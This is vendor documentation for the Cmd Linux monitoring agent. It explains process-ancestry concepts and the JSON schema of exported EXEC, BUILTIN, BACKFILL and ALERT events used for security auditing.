Data export schema

Learn the structure of the Linux session and event data captured by Cmd (both within the web app and after export)

This page explains the structure of Cmd data, and how it appears when you export it for additional analysis or long-term storage. The first part explains important background information about the data, and the latter half details the fields included when you export various types of events.

Contents

  1. Introduction
  2. Linux process model: Foundational concepts
  3. TTY device major and minor numbers
  4. EXEC events
  5. BUILTIN events
  6. BACKFILL events
  7. ALERT events

Introduction

Cmd can export recorded Linux events as newline-delimited JSON to objects in your S3 and GCS buckets. These JSON objects have a common subset of fields, most notably event_type . The value of event_type may be either EXEC, BUILTIN or BACKFILL, and defines what additional fields may be present in the object.

This document starts with a conceptual overview, followed by sections that describe the JSON object fields of the EXEC, BUILTIN and BACKFILL events.

Note: In the future, Cmd may add fields to the schema. Please ensure your data processing tools are configured to ignore unknown fields.

Cmd Audit and Cmd Control

This data schema applies to both the Cmd Control and Cmd Audit agents, with some caveats:

  • The Cmd Audit agent does not record BUILTIN events.
  • For analysis of data exported prior to May 2020, see the legacy data export schema.

Events: Linux process context

Many exported events contain information about their Linux process context. This valuable information allows you to determine who really created a process, regardless of local changes of user identity using sudo or su. It includes each process' controlling terminal, as well as whether its stdin , stdout , and stderr are tied to that controlling terminal. This makes it easier to differentiate between interactive processes started by humans and those started by services such as web servers.

There is a delicate balance between including too much or too little information with each event. More information about each event simplifies the processing of data from S3 and GCS because little or no information from other events is required to process each event; context is self-contained. Less information in the event means lower bandwidth requirements, RAM, and persistent storage usage.

Our solution is to include information in each event about several important related processes — but not about its entire process ancestry. We include information about the:

  • first connected (“inception”) session process;
  • session leader process;
  • last known user-entered process;
  • parent process; and,
  • the current (“self”) process, in which the event occurred.

Other than parent and self, these are detailed below.

Linux process model: Foundational concepts

Linux processes have hierarchical ancestry, wherein each process is created by a single parent process (using the fork() or clone() system calls). Much information is inherited from the parent process, including open file descriptors (e.g. stdin, stdout, stderr) and the Linux user ID. A session leader is the oldest ancestor process in a set of related processes such as an SSH session. You can identify session leaders by their having identical process IDs (PIDs) and session IDs (SIDs), and processes within a session have the SID value of that session’s session leader. Note that Linux servers can reuse PIDs over time (though not at the same time), so do not rely on the PID or SID alone to correlate events. Instead use the process UUIDs, which are generated by Cmd, and take into account boot ID, process start time, and other information to ensure they are unique. Much more can be learned about process hierarchy by running ps axjf in a Linux shell.

Process: “Inception session”

The inception session is the process responsible for a user’s first entry onto a server, where credentials are exchanged. For example, a Bash shell that results from logging in with SSH, AWS SSM, a serial terminal, or a console, is an inception session. When shared Linux users such as “ubuntu” or “ec2-user” are not in use, each inception session process is reliably associated with a user, based on their server login credentials. Even with shared users enabled, if you use Cmd to require MFA after login, Cmd will provide information about the actual user and their roles (in the cmd_user and cmd_roles fields described below). There is one sub-category of inception session processes: internal inception sessions. These represent services, typically ones started when the server boots, such as web servers, databases, sshd, etc. Specifically, these are the processes started by the init process (PID 1, typically systemd). You can differentiate between internal and external inception sessions by looking at their parent PIDs, ancestor sessions, and whether they are interactive (have a controlling terminal).

Process: “Session leader”

A session leader is the process that starts a session. Typically, the inception session for an event is also its session leader. Exceptions to this rule can occur due to terminal multiplexers like tmux or screen , which call setsid() . When you enter a multiplexed session, it does not affect the inception session, but changes the session leader for events from that session to the multiplexed session itself. Multiplexed shell sessions do not go away if you log out of your inception session. System administrators often use them when facing network instability; they can reconnect and reattach to the multiplexed session, and Cmd will still associate the events from the multiplexed session with the same inception session.

Process: “Last known user-entered”

The last known user-entered process (LKUEP) is an estimation of the most recent ancestor of the event’s self process that was initiated by an external human user. Previously, Cmd determined whether a process was user-entered based on bash-specific information, but now uses information that works across more shells (ksh, zsh, etc). A user-entered process is defined by these criteria:

  1. Its parent process' stdin is reading from the controlling terminal (i.e. user could have entered ls ).
  2. Its parent process' stderr is writing to the controlling terminal.
  3. Its PGID differs from its parent process’ PGID.

Note that when a shell runs programs entered by users, for example ls , the shell reads what the user typed from its controlling terminal ( ls and return) and creates a child process for ls that is in a new process group (with a new PGID). Programs in pipelines such as cat foo.txt | grep bar | wc -l all share the same process group. Therefore each program — cat , grep , and wc — will be the LKUEP for their descendant processes, until one of those descendants matches the above criteria. Even if a process matches the criteria, it will not become its own LKUEP.

To view the process tree in a terminal, you can use ps ajxf , and to check on the stdin and stderr of any processes, you can use lsof -p <pid1>,..,<pidN> | grep -E '(0u|2u)' . Also note that an event’s LKUEP and parent process executable basename correspond to the cmd_parent_cmd_root CQL value (dual valued).

Example: Processes associated with EXEC events

The inception session, session leader, parent, and self processes are present in all exported events, even if some correspond to the same process. For example, consider the case where you login with SSH and in your login shell execute ls . For the EXEC event associated with your login shell, your login shell is both the self process and the inception session, the parent process is sshd, and the session leader is sshd’s session leader. For the EXEC event associated with ls , the inception session process is the login shell, the parent process is the login shell, the session leader is the login shell and the self process is ls . In rare cases, depending on the sensor technology and its configuration, a process may be absent from the event because it could not be captured quickly enough (e.g. a very short lived parent process).

TTY Device Major and Minor Numbers

The Linux process information in exported events contains device “major” and “minor” numbers for the controlling terminal, standard input (stdin), standard output (stdout) and standard error (stderr) file descriptors. This section describes how to interpret this information.

Controlling terminals ensure that control-Z sends a STOP signal to the foreground process group, determine whether user input is echoed on screen, and perform other tasks related to the user interface. Rather than requiring all programs that can start interactive sessions (such as sshd) to re-implement this logic, the Linux kernel offers TTY devices so the logic can be shared. These devices have a major and minor number to identify them.

Controlling terminals in Linux are typically one of the following:

  • Pseudo terminal:
    Session input comes from over the network, for example from SSH or SSM.
  • Serial terminal:
    Session input comes from a UART/serial chip on the motherboard or virtual hardware.
  • Virtual console:
    Session input comes from a keyboard device (USB, PS2, virtual, etc).
  • None:
    Services do not need controlling terminals.
Major and Minor Number Ranges for controlling terminals:
Device Major number Minor number Example
Pseudo terminal 136 to 143 0 to 254 123,1 -> /dev/pts/1
Virtual console 4 0 to 63 4,2 -> /dev/tty2
Serial terminal 4 64 to 254 4,64 ->/dev/ttyS0
No device 0 - -

The device major and minor numbers associated with a process' stdin, stdout, and stderr are included in exported events. They will match the numbers above if they are bound to a controlling terminal. In cases where they are associated with a file, the device major and minor numbers will be those of the block device (disk) and partition where that file resides, e.g. “8,1”.

Learn more about Linux devices.

EXEC event data schema

In Linux, “running” a program requires an “EXEC”. EXEC is short for execute, as in “execute this program”, and uses the execve() system call. The following tables describe the fields of the JSON objects exported by Cmd for the EXEC events from your Cmd-monitored servers.

Properties that appear once per EXEC event

Field name Description
version String. The version number of the event type’s data structure (e.g. Exec 1.0.0). Major version changes (e.g. 1.0.0 to 2.0.0) reflect updates that may require significant changes to your data processing pipelines. Minor version number changes refer to backwards-compatible changes such as adding fields.
event_type String. Value is always “EXEC”. These JSON objects represent events that result from exec() system calls.
server_uuid String. UUID of the server that emitted the event.
project_id String. ID of the project that emitted the event.
company_id String. ID of the company that emitted the event.
event_uuid String. UUID of the event itself.
process_uuid String. UUID of the process that emitted the event.
session_uuid String. UUID of the session that emitted the event.
parent_uuid String. UUID of the parent of the process that emitted the event.
group_uuid String. UUID of the process group for the process that emitted the event.
inception_session_city City associated with the source IP of the inception SSH session, if available. (A private IP will not show a city).
E.g. Boulder
inception_session_country Country associated with the inception SSH session’s source IP address, if available.
E.g. United States
inception_session_ip_risk Risk rating of the inception SSH session’s source IP address, according to MaxMind. From 0.01 to 99, where higher scores indicate higher risk.
E.g. 87
inception_session_ip_latitude WGS84 Latitude associated with the inception SSH session’s source IP address, if available. Values range from -90.0000 to 90.0000.
E.g. 49.1239
inception_session_ip_longitude WGS84 Longitude associated with the inception SSH session’s source IP address, if available. Values range from -180.0000 to 180.0000.
E.g. -123.1938
inception_session_region Region associated with the inception SSH session’s source IP address, if available.
E.g. Colorado
interactive_session Boolean. Whether the session is interactive (has a controlling terminal).
interactive_process Boolean. Whether the self process stdin and stderr are bound to the controlling terminal. In Cmd Control agents prior to v1.4.0, true when the process was launched from bash and bash considered itself to be interactive as per the bash man page.
pid_ns_ino String. PID namespace ID from which the process was observed. See “man 7 namespaces” for additional details.
server_groups Any server groups you have associated with this agent install using it’s config.ini or the Cmd web app.
E.g. web-server, production
server_hostname Hostname associated with the Linux server, VM, or container where the agent is deployed.
E.g. webapp1-e9381
server_name Name assigned to the server in the config.ini or in the Cmd web app.
E.g. webapp1
server_ips IP addresses associated with the server, VM, or container where the agent is deployed.
E.g 192.168.22.3
session_leader Boolean. Whether the session is a session leader. The session leader is the process that initially created the session, and its SID is the same as its PID. See “man credentials” to learn more.
thread_id (Cmd Audit only). Integer. The Linux thread ID of the thread in which the event occurred. This, along with cpu_id, can help disambiguate events of the same type that occur in rapid succession, when event_time may not be granular enough.
boot_id String. Unique identifier for the currently booted Linux OS. It is newlygenerated every reboot. Originates from /proc/sys/kernel/random/boot_id.
cpu_id (Cmd Audit only).Integer. Identifies the CPU core on the system on which this event was observed.
event_time String. A timestamp that represents when the event started.
Format: RFC3339Nano
user_typed Boolean. Whether the event was the result of a user-typed command. (In other words, whether the self process matches the LKUEP criteria.)
uts_domain_name Domain name (as per “man 2 getdomainname”) associated with the Linux server, VM, or container in which the process is executed.
uts_hostname Hostname (as per “man 2 gethostname”) associated with the Linux server, VM, or container in which the associated process is executed. May differ from the server_hostname (UTS hostname where the agent is running) when the process execution is in a container and the agent is not (such as with a Kubernetes DaemonSet configured to run in the host PID namespace).
E.g. my-pod123
inception_session_uuid String. UUID of the inception session for the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
last_known_uec_parent_uuid String. UUID of the last known UEC parent of the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
cri_namespace The process' Kubernetes namespace.
E.g. default
cri_pod_name The process' Kubernetes pod name.
E.g. cmd-nginx
cri_node_name The process' Kubernetes node name.
E.g. node-1234
cri_container_id The process' runtime container ID, i.e. the CRI-O or containerd container ID.
E.g. 0c4e3b80c0b3fb798b4163dbc489ed739e67435bdfd83545c7fc45c0419c135c
cri_container_image The process' container image’s hash.
E.g. sha256:bd0ad0dd8520627a4478298cd74fead558b7819167a5b40d09ea6aaee9c92153
cri_container_name The process' container name.
E.g. nginx

Properties that appear multiple times per EXEC event

The following properties are present five times in each event, once for each process the event describes: self; parent; session; inception_session; and last_known_uec_parent. For example, the field described here as *_exe appears in each exported event as self_exe, parent_exe, session_exe, inception_session_exe, and last_known_uec_parent_exe.

Field name Description
*_exe String. Absolute file path to the command.
*_user String. Username associated with the effective user ID (EUID Note: for containerized workloads from an outer PID namespace, this value may be incorrect or missing because the /etc/passwd with the correct username resides within the container image.
*_pid Integer. The process’ PID. See “man credentials” for additional details.
*_ppid Integer. The process’ PPID. See “man credentials” for additional details.
*_sid Integer. The process’ SID. Identifies a collection of processes for job control purposes. Equals the PID of the session leader. See “man credentials” for additional details.
*_pgid Integer. PGID of the process. Identifies a collection of processes for job control (signalling) purposes. Equal to the PID of the process group leader. See “man credentials” for additional details.
*_suid Integer. The process’ saved user ID (SUID). Allows a process to elevate and drop privileges as a user. See “man credentials” for additional details.
*_sgid Integer. The process’ saved set group ID (SGID). Allows a process to elevate and drop privileges as a group. See “man credentials” for additional details.
*_ruid Integer. The process’ real user ID (RUID). Identifies the user who owns the process. See “man credentials” for additional details.
*_rgid Integer. The process’ real group ID (RGID). The RUID identifies the group who owns the process. See “man credentials” for additional details.
*_euid Integer. The process’ effective user ID (EUID). Determines permissions for accessing shared resources and files as a user. See “man credentials” for additional details.
*_egid Integer. The process’ effective group ID (EGID). Determines permissions for accessing shared resources and files as a group. See “man credentials” for additional details.
*_ctty_minor Integer. Minor device number of the process’ controlling terminal. Uniquely identifies a particular device within a general class.
*_ctty_major Integer. Major device number of the process’ controlling terminal. The major number identifies the general class of device, and is used by the kernel to find the appropriate driver.
*_stdin_minor Integer. Minor device number of the process’ standard input.
*_stdin_major Integer. Major device number of the process’ standard input.
*_stdout_minor Integer. Minor device number of the process’ standard output.
*_stdout_major Integer. Major device number of the process’ standard output.
*_stderr_minor Integer. Minor device number of the process’ standard error.
*_stderr_major Integer. Major device number of the process’ standard error.
*_start_time_ticks String. Start time of the process in clock ticks since system boot. See “starttime” under /proc/[pid]/stat in “man proc” for additional details. The value is stored as a string because it is unsafe for JavaScript to store a uint64 as an integer.
shell_completion Boolean. Whether shell completion is set. Meaningful only when the self process is bash.
shell_rl_buffer String. The user-typed command obtained from the shell’s read line buffer. Meaningful only when the self process was launched from or is bash.
shell_command_number String. The number of commands executed so far in the current shell. The value is stored as a string because it is unsafe for JavaScript to store a uint64 as an integer. Meaningful only when the self process was launched from or is bash.
inception_estimated_start_time String. Estimated time for when the inception session started.
inception_entry_mechanism String. Entry mechanism used in the inception session. Can help determine how the user connected. Current values are UNKNOWN, SSH, INIT, TTY, CONSOLE, AWS_SSM and OTHER. For Cmd Control agents prior to v1.4.0 values are SSH, TTY and UNKNOWN.
inception_source_ip String. The source IP address of where the inception session started, if applicable, for the type of the inception_entry_mechanism.
cmd_user String. Cmd username, typically an email address. Populated after the first MFA in a session.
cmd_roles Array of strings. Cmd roles associated with the Cmd user after successful MFA into this session
exe String. Absolute file path of the executed command. This should be used in preference to self_exe, even though they will have the same value. See /proc/[pid]/exe in “man proc” for additional details.
cwd String. Absolute file path of the current working directory of the self process at the time of the exec. See /proc/[pid]/cwd in “man proc” for additional details.
args Array of strings. The command line arguments used when invoking the program. These arguments are passed to the entry point of the executable. The first item in the array is typically but not always the base name of the executable as per /proc/<pid> /cmdline.
trigger_ids Array of strings. A list of the trigger IDs associated with the event.
inception_session_env_vars List of 1-5 key value pairs. The environment variables captured at session start. Will not appear unless you set up env var capture. E.g.: [{“name”: “env var name”, “value”: “env var value”}]

BUILTIN event data schema

These events describe Bash builtin commands, and consequently only appear as a result of Bash sessions. These events are recorded only by Cmd Control. The following tables describe the Builtin object’s JSON fields. Bash builtins are things like “cd” and “echo” that are handled internally by the Bash process itself instead of forking and executing another program as would occur if you typed something like /bin/ls. In some cases builtins may also have an executable version as well. For example “echo” the builtin vs /bin/echo the executable file. The executable versions are always represented with the EXEC event_type.

Properties that appear once per BUILTIN event

Field name Description
version String. The version number of the event type’s data structure (e.g. Builtin 1.0.0). Major version changes (e.g. 1.0.0 to 2.0.0) reflect updates that may require significant changes to your data processing pipelines. Minor version number changes refer to backwards-compatible changes such as adding fields.
event_type String. Value is “BUILTIN”. These JSON objects represent events that result from builtin Bash commands.
server_uuid String. UUID of the server that emitted the event.
project_id String. ID of the project that emitted the event.
company_id String. ID of the company that emitted the event.
event_uuid String. UUID of the event itself.
process_uuid String. UUID of the process that emitted the event.
session_uuid String. UUID of the session that emitted the event.
group_uuid String. UUID of the process group for the process that emitted the event
parent_uuid String. UUID of the parent of the process that emitted the event.
inception_session_uuid String. UUID of the inception session for the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
last_known_uec_parent_uuid String. UUID of the last known UEC parent of the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
interactive_session Boolean. Whether the session is interactive (has a controlling terminal).
interactive_process Boolean. Whether the self process’ stdin and stderr are bound to the controlling terminal. In Cmd Control agents prior to v1.4.0, true when the process was launched from bash and bash considered itself to be interactive as per the bash man page.
session_leader Boolean. Whether the session is a session leader. The session leader is the process that initially created the session, and its SID is the same as its PID. See “man credentials” to learn more.
cpu_id (Cmd Audit only).
Integer. Identifies the CPU core on the system on which this event was observed.
thread_id (Cmd Audit only).
Integer. The Linux thread ID of the thread in which the event occurred. This, along with cpu_id, can help disambiguate events of the same type that occur in rapid succession, when event_time may not be granular enough.
event_time String. A timestamp that represents when the event started. Format: RFC3339Nano
boot_id String. Unique identifier for the currently booted Linux OS. It is newly generated every reboot. Originates from /proc/sys/kernel/random/boot_id.
pid_ns_ino String. PID namespace ID from which the process was observed. See “man 7 namespaces” for additional details.
user_typed Boolean. Whether the event was the result of a user-typed command. (In other words, whether the self process matches the LKUEP criteria.)

Properties that appear multiple times per BUILTIN event

The following properties are present five times in each event, once for each process the event describes: self; parent; session; inception_session; and last_known_uec_parent. For example, the field described here as *_exe appears in each exported event as self_exe, parent_exe, session_exe, inception_session_exe, and last_known_uec_parent_exe.

Field name Description
*_exe String. Absolute file path to the command.
*_user String. Username associated with the effective user ID (EUID) Note: for containerized workloads from an outer PID namespace, this value may be incorrect or missing because the /etc/passwd with the correct username resides within the container image.
*_pid Integer. The process’ PID. See “man credentials” for additional details.
*_ppid Integer. The process’ PPID. See “man credentials” for additional details.
*_sid Integer. The process’ SID. Identifies a collection of processes for job control purposes. Equals the PID of the session leader. See “man credentials” for additional details.
*_pgid Integer. PGID of the process. Identifies a collection of processes for job control (signalling) purposes. Equal to the PID of the process group leader. See “man credentials” for additional details.
*_suid Integer. The process’ saved user ID (SUID). Allows a process to elevate and drop privileges as a user. See “man credentials” for additional details.
*_sgid Integer. The process’ saved set group ID (SGID). Allows a process to elevate and drop privileges as a group. See “man credentials” for additional details.
*_ruid Integer. The process’ real user ID (RUID). Identifies the user who owns the process. See “man credentials” for additional details.
*_rgid Integer. The process’ real group ID (RGID). The RUID identifies the group who owns the process. See “man credentials” for additional details.
*_euid Integer. The process’ effective user ID (EUID). Determines permissions for accessing shared resources and files as a user. See “man credentials” for additional details.
*_egid Integer. The process’ effective group ID (EGID). Determines permissions for accessing shared resources and files as a group. See “man credentials” for additional details.
*_ctty_minor Integer. Minor device number of the process’ controlling terminal. Uniquely identifies a particular device within a general class.
*_ctty_major Integer. Major device number of the process’ controlling terminal. The major number identifies the general class of device, and is used by the kernel to find the appropriate driver.
*_stdin_minor Integer. Minor device number of the process’ standard input.
*_stdin_major Integer. Major device number of the process’ standard input.
*_stdout_minor Integer. Minor device number of the process’ standard output.
*_stdout_major Integer. Major device number of the process’ standard output.
*_stderr_minor Integer. Minor device number of the process’ standard error.
*_stderr_major Integer. Major device number of the process’ standard error.
*_start_time_ticks String. Start time of the process in clock ticks since system boot. See “starttime” under /proc/[pid]/stat in “man proc” for additional details. The value is stored as a string because it is unsafe for JavaScript to store a uint64 as an integer.
shell_completion Boolean. Whether shell completion is set. Meaningful only when the self process is bash.
shell_rl_buffer String. The user-typed command obtained from the shell’s read line buffer. Meaningful only when the self process was launched from or is bash.
shell_command_number String. The number of commands executed so far in the current shell. The value is stored as a string because it is unsafe for JavaScript to store a uint64 as an integer. Meaningful only when the self process was launched from or is bash.
inception_estimated_start_time String. Estimated time for when the inception session started.
inception_entry_mechanism String. Entry mechanism used in the inception session. This helps determine how the user connected. Current values are UNKNOWN, SSH, INIT, TTY, CONSOLE, AWS_SSM and OTHER. For Cmd Control agents prior to v1.4.0 values are SSH, TTY and UNKNOWN.
inception_source_ip String. The source IP address of where the inception session started, if applicable, for the type of the inception_entry_mechanism.
cmd_user String. Cmd username, typically an email address. Populated after the first MFA in a session.
cmd_roles Array of strings. Cmd roles associated with the Cmd user after successful MFA into this session.
exe String. Absolute file path of the executed command. This should be used in preference to self_exe, even though they will have the same value. See /proc/[pid]/exe in “man proc” for additional details.
cwd String. Absolute file path of the current working directory of the self process at the time of the exec. See /proc/[pid]/cwd in “man proc” for additional details.
args Array of strings. The command line arguments used when invoking the program. These arguments are passed to the entry point of the executable. The first item in the array is typically but not always the base name of the executable as per /proc/<pid> /cmdline.
trigger_ids Array of strings. A list of the trigger IDs associated with the event.
inception_session_env_vars List of 1-5 key value pairs. The environment variables captured at session start. Will not appear unless you set up env var capture.
E.g.: [{"name": "env var name", "value": "env var value"}]

BACKFILL event data schema

Backfill events are sent, if required, to fill in gaps in process ancestry. They do not represent an execve() system call as EXEC events do, but have similar fields and are intended to approximate EXECs. The information in the event is gathered from sources including /proc.

Properties that appear once per BACKFILL event

Field name Description
version String. The version number of the event type’s data structure (e.g. Backfill 1.0.0). Major version changes (e.g. 1.0.0 to 2.0.0) reflect updates that may require significant changes to your data processing pipelines. Minor version number changes refer to backwards-compatible changes such as adding fields.
event_type String. Value is always “BACKFILL”. These JSON objects represent Backfill events.
server_uuid String. UUID of the server that emitted the event.
project_id String. ID of the project that emitted the event.
company_id String. ID of the company that emitted the event.
event_uuid String. UUID of the event itself.
process_uuid String. UUID of the process that emitted the event.
session_uuid String. UUID of the session that emitted the event.
parent_uuid String. UUID of the parent of the process that emitted the event.
group_uuid String. UUID of the process group for the process that emitted the event.
inception_session_uuid String. UUID of the inception session for the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
last_known_uec_parent_uuid String. UUID of the last known UEC parent of the process that emitted this event.
E.g. e3b24ade-8b84-546f-b969-d95dca2641b8
interactive_session Boolean. Whether the session is interactive (has a controlling terminal).
interactive_process Boolean. Whether the self process stdin and stderr are bound to the controlling terminal. In Cmd Control agents prior to v1.4.0, true when the process was launched from bash and bash considered itself to be interactive as per the bash man page.
session_leader Boolean. Whether the session is a session leader. The session leader is the process that initially created the session, and its SID is the same as its PID. See “man credentials” to learn more.
user_typed Boolean. Whether the event was the result of a user-typed command. (In other words, whether the self process matches the LKUEP criteria.)
boot_id String. Unique identifier for the currently booted Linux OS. It is newlygenerated every reboot. Originates from /proc/sys/kernel/random/boot_id.
pid_ns_ino String. PID namespace ID from which the process was observed. See “man 7 namespaces” for additional details.
inception_estimated_start_time String. Estimated time when the inception session began.
inception_entry_mechanism String. Entry mechanism used in the inception session. This helps determine how the user connected. Current values are UNKNOWN, SSH, INIT, TTY, CONSOLE, AWS_SSM and OTHER. For Cmd Control agents prior to 1.4.0 values are SSH, TTY and UNKNOWN.
inception_source_ip String. The IP address that initiated the SSH session responsible for this event.
cmd_user String. Name of the Cmd user that caused the alert, if they performed 2FA during this session (prior to the alert).
cmd_roles List of strings. Any Cmd roles associated with the user’s Cmd account.
inception_session_env_vars List of strings. The environment variables that were recorded at the beginning of the session.
inception_session_city String. City associated with the source IP of the inception SSH session, if available. (A private IP will not show a city).
E.g. Boulder
inception_session_country String. Country associated with the inception SSH session’s source IP address, if available.
E.g. United States
inception_session_ip_risk Float. Risk rating of the inception SSH session’s source IP address, according to MaxMind. 0.01 to 99. A higher score indicates a higher risk of fraud.
E.g. 87
inception_session_ip_latitude WGS84 Latitude associated with the inception SSH session’s source IP address, if available. Values range from -90.0000 to 90.0000.
E.g. 49.1239
inception_session_ip_longitude WGS84 Longitude associated with the inception SSH session’s source IP address, if available. Values range from -180.0000 to 180.0000.
E.g. -123.1938
inception_session_region Region associated with the inception SSH session’s source IP address, if available.
E.g. Colorado
server_groups Any server groups you have associated with this agent install using it’s config.ini or the Cmd web app.
E.g. web-server, production
inception_server_hostname Hostname associated with the Linux server, VM, or container where the agent is deployed.
E.g. webapp1-e9381
server_name Name assigned to the server in the config.ini or in the Cmd web app.
E.g. webapp1
server_ips List of strings. IP addresses associated with the server, VM, or container where the agent is deployed.
E.g 192.168.22.3
thread_id (Cmd Audit only). Integer. The Linux thread ID of the thread in which the event occurred. This, along with cpu_id, can help disambiguate events of the same type that occur in rapid succession, when event_time may not be granular enough.
cpu_id (Cmd Audit only).Integer. Identifies the CPU core on the system on which this event was observed.
cri_namespace The process' Kubernetes namespace.
E.g. default
cri_pod_name The process' Kubernetes pod name.
E.g. cmd-nginx
cri_node_name The process' Kubernetes node name.
E.g. node-1234
cri_container_id The process' runtime container ID, i.e. the CRI-O or containerd container ID.
E.g. 0c4e3b80c0b3fb798b4163dbc489ed739e67435bdfd83545c7fc45c0419c135c
cri_container_image The process' container image’s hash.
E.g. sha256:bd0ad0dd8520627a4478298cd74fead558b7819167a5b40d09ea6aaee9c92153
cri_container_name The process' container name.
E.g. nginx

Properties that appear multiple times per BACKFILL event

The following properties are present five times in each event, once for each process the event describes: self; parent; session; inception_session; and last_known_uec_parent. For example, the field described here as *_exe appears in each exported event as self_exe, parent_exe, session_exe, inception_session_exe, and last_known_uec_parent_exe.

Field name Description
*_exe String. Absolute file path to the command.
*_user String. Username associated with the effective user ID (EUID) Note: for containerized workloads from an outer PID namespace, this value may be incorrect or missing because the /etc/passwd with the correct username resides within the container image.
*_pid Integer. The process’ PID. See “man credentials” for additional details.
*_ppid Integer. The process’ PPID. See “man credentials” for additional details.
*_sid Integer. The process’ SID. Identifies a collection of processes for job control purposes. Equals the PID of the session leader. See “man credentials” for additional details.
*_pgid Integer. PGID of the process. Identifies a collection of processes for job control (signalling) purposes. Equal to the PID of the process group leader. See “man credentials” for additional details.
*_suid Integer. The process’ saved user ID (SUID). Allows a process to elevate and drop privileges as a user. See “man credentials” for additional details.
*_sgid Integer. The process’ saved set group ID (SGID). Allows a process to elevate and drop privileges as a group. See “man credentials” for additional details.
*_ruid Integer. The process’ real user ID (RUID). Identifies the user who owns the process. See “man credentials” for additional details.
*_rgid Integer. The process’ real group ID (RGID). The RUID identifies the group who owns the process. See “man credentials” for additional details.
*_euid Integer. The process’ effective user ID (EUID). Determines permissions for accessing shared resources and files as a user. See “man credentials” for additional details.
*_egid Integer. The process’ effective group ID (EGID). Determines permissions for accessing shared resources and files as a group. See “man credentials” for additional details.
*_ctty_minor Integer. Minor device number of the process’ controlling terminal. Uniquely identifies a particular device within a general class.
*_ctty_major Integer. Major device number of the process’ controlling terminal. The major number identifies the general class of device, and is used by the kernel to find the appropriate driver.
*_stdin_minor Integer. Minor device number of the process’ standard input.
*_stdin_major Integer. Major device number of the process’ standard input.
*_stdout_minor Integer. Minor device number of the process’ standard output.
*_stdout_major Integer. Major device number of the process’ standard output.
*_stderr_minor Integer. Minor device number of the process’ standard error.
*_stderr_major Integer. Major device number of the process’ standard error.
*_start_time_ticks String. Start time of the process in clock ticks since system boot. See “starttime” under /proc/[pid]/stat in “man proc” for additional details. The value is stored as a string because it is unsafe for JavaScript to store a uint64 as an integer.

ALERT event data schema

Alert events occur when triggers fire. Each Alert event includes the following fields:

Field name Description
version String. The version number of the event type’s data structure (e.g. Alert 1.0.0). Major version changes (e.g. 1.0.0 to 2.0.0) reflect updates that may require significant changes to your data processing pipelines. Minor version number changes refer to backwards-compatible changes such as adding fields.
event_type String. Value is “ALERT”. These JSON objects represent alert events.
server_uuid String. UUID of the server that emitted the event.
project_id String. ID of the project that emitted the event.
company_id String. ID of the company that emitted the event.
inception_session_ip_risk Float. Risk rating (1-99) of the inception SSH session’s source IP address, according to MaxMind. Higher scores indicate higher risk.
inception_source_ip String. The IP address that initiated the SSH session responsible for this alert.
server_hostname String. Hostname associated with the Linux server, VM, or container where the agent is deployed.
E.g. webapp1-e9381
server_name String. Name assigned to the server in the config.ini or in the Cmd web app.
E.g. webapp1
server_ips List of strings. IP addresses associated with the server, VM, or container where the alert took place.
E.g. ["127.0.0.1","20.438.0.24"]
alert_type String. The type of trigger that caused the alert. Either Exec, Builtin, Session, File, or AuthFailure.
alert_uuid String. UUID of the alert that was resolved.
E.g. 2e00fcf2-8b6c-11eb-8c7c-0242ac110002
alert_level Integer. Alert level defined in the fired trigger (0-5).
alert_time String. Time when the alert that this event resolved occured, in UTC.
Formatted as: YYYY-MM-DDTHH:mm:ss.SSSSSSSSSZ
trigger_uuid String. E.g. c98516d0-8b4c-11eb-9f0b-7fab23aff4a4
trigger_group_uuid String. E.g. 4e3c3833-8b32-11eb-9048-0242ac110002
trigger_type String. Values include “generic” (file trigger), “session” (session trigger), and “file” (file trigger).
trigger_name String. Name of the fired trigger.
trigger_description String. Description of the fired trigger.
trigger_query String. Query used in the fired trigger.
trigger_actions Array of objects. The actions associated with the trigger that created the alert, in the format: [ { action: , value: } ].
E.g. [ { action: "send_slack", value: "{\"integration_id\": \"dfa12de583734352a11ee7121bf3b645\""} ]
event_uuid String. UUID of the event that caused the alert that was resolved (command triggers only).
E.g. **4e3c3833-8b32-11eb-9048-0242ac110002 **
process_uuid String. UUID of the process that caused the trigger to fire.
E.g. 4e3c3833-8b32-11eb-9048-0242ac110002
inception_session_uuid String. UUID of the inception session that caused the alert.
E.g. 5fee9bd6-63bd-5895-a954-7d92bbe5ed30
interactive_session Boolean. True when the session that caused the alert was interactive.
interactive_process Boolean. True when the process that caused the alert was interactive (command triggers only).
user_typed Boolean. True when the command that caused the alert was deemed to have been typed by a user (command triggers only).
inception_session_start_time String. Time when the alert’s inception session began, in UTC.
Formatted as: YYYY-MM-DDTHH:mm:ss.SSSSSSSSSZ
cmd_user String. Name of the Cmd user that caused the alert, if they performed 2FA during this session (prior to the alert).
cmd_roles List of strings. Any Cmd roles associated with the user’s Cmd account.
inception_session_user String. Name of the Linux user that created the inception session.
inception_entry_mechanism String. Entry mechanism used in the inception session. Can help determine how the user connected. Current values are UNKNOWN, SSH, INIT, TTY, CONSOLE, AWS_SSM and OTHER. For Cmd Control agents prior to 1.4.0 values are SSH, TTY and UNKNOWN.
args Array of strings. The command line arguments used when invoking the program. These arguments are passed to the entry point of the executable. The first item in the array is typically but not always the base name of the executable as per /proc/cmdline. (Command triggers only).
cwd String. The working directory when the command was fired.
self_exe String. The executable path of the command that caused the alert (command triggers only).
self_user String. The user who executed the command that caused the alert (command triggers only).
event_time String. Time when the event that caused the alert occurred, in UTC.
Formatted as: YYYY-MM-DDTHH:mm:ss.SSSSSSSSSZ.
ancestor_exe Array of strings. For command triggers only, the executable paths on the way up the process tree from the event that caused the alert to the beginning of the session.
E.g. [".",“tmux”]
filename The name of the file that caused a file alert to happen. (File triggers only).